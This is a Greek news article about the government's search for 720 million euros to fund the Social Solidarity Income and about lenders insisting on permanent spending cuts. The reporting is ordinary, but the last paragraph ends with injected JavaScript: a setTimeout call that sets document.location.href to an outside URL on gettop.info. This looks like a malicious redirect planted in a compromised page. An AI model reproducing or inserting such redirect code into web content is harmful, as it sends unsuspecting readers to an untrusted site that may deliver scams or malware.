Αναζητούν 720 εκατ. € για το εγγυημένο εισόδημα

0
7

 

Αγώνας δρόμου από την κυβέρνηση για να βρει 720 εκατ. ευρώ ώστε να διασφαλίσει τη χρηματοδότηση του Κοινωνικού Εισοδήματος Αλληλεγγύης (ΚΕΑ). Σύμφωνα με πληροφορίες που επικαλείται η «Καθημερινή», κατά τη χθεσινή συνάντηση με τους επικεφαλής των θεσμών (είχε προηγηθεί σημαντική εμπλοκή στις διαπραγματεύσεις σε τεχνικό επίπεδο, από την Τρίτη), οι δανειστές επέμειναν στη θέση τους να υπάρξουν μόνιμου χαρακτήρα πηγές χρηματοδότησης του θεσμού, όχι μόνο για το 2017 αλλά και για τα επόμενα έτη.

Η ελληνική πλευρά παρουσίασε την έκθεση της Παγκόσμιας Τράπεζας, σύμφωνα με την οποία δεν υπάρχει δημοσιονομικό περιθώριο για περικοπές σε προνοιακού τύπου επιδόματα (αναπηρικά και οικογενειακά επιδόματα). Στον αντίποδα, σύμφωνα με την «Καθημερινή», προτείνονται μειώσεις σε ανταποδοτικού τύπου επιδόματα που δίνονται μέσω της κοινωνικής ασφάλισης (π.χ. κατασκηνώσεις ανέργων, για τις οποίες κάθε εργοδότης καταβάλλει 20 ευρώ τον χρόνο ανά εργαζόμενο), καθώς και σε όλο το φάσμα των φοροαπαλλαγών. Αρμόδια στελέχη αναφέρουν ότι η ελληνική πλευρά υποστηρίζει πως η χρηματοδότηση του ΚΕΑ για το 2017 είναι διασφαλισμένη από την προβλεπόμενη υπεραπόδοση των ήδη ψηφισμένων μέτρων.

Για το 2018 και το οικονομικό επιτελείο παραδέχεται ότι υπάρχει «κενό» στη χρηματοδότησή του, το οποίο επιχειρηματολογεί ότι θα καλυφθεί από τις εξοικονομήσεις που θα προκύψουν από την επισκόπηση των δαπανών (spending review) που θα ξεκινήσει φέτος και θα ολοκληρωθεί έως τα μέσα του 2017. Επίσης, μεταξύ των προτάσεων της κυβέρνησης που έχουν ήδη απορριφθεί από την τρόικα, είναι και η περικοπή κατά περίπου 250 εκατ. ευρώ των αμυντικών δαπανών υπέρ της χρηματοδότησης του ΚΕΑ.

Ωστόσο, οι εκπρόσωποι των θεμσών έχουν καταστήσει σαφές ότι η χρηματοδότηση του μέτρου θα πρέπει να προέρχεται από τη μείωση των δαπανών και όχι από νέους φόρους. Και σε κάθε περίπτωση, τα μέτρα που θα προσδιοριστούν, θα πρέπει να έχουν μόνιμου χαρακτήρα απόδοση, ώστε να εξασφαλίζεται η χρηματοδότηση του Εισοδήματος σε βάθος ετών.

Κατά τη συνάντηση, στην οποία πηγές από το υπουργείο Εργασίας αναφέρουν ότι διαπιστώθηκε «ένα αντικειμενικό πρόβλημα», συμφωνήθηκε να συνεχιστούν από σήμερα η επεξεργασία των στοιχείων της πρώτης φάσης εφαρμογής του Ελάχιστου Εγγυημένου Εισοδήματος από την πλατφόρμα της ΗΔΙΚΑ καθώς και η προβολή πολλαπλών σεναρίων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here